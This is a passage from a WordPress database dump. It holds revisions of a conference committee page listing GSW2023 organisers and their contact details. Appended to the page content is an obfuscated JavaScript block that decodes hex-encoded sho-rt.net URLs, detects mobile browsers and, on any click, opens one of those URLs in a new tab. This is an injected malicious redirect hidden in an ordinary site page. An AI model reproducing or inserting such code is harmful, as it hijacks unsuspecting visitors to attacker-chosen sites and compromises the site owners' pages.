12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-09-06 06:12:29','2023-09-06 06:12:29','',4849,'https://gsw2023.com/?p=5464',0,'revision','',0),
(5465,1,'2023-09-06 06:20:01','2023-09-06 06:20:01','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\">m.elqurashi@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 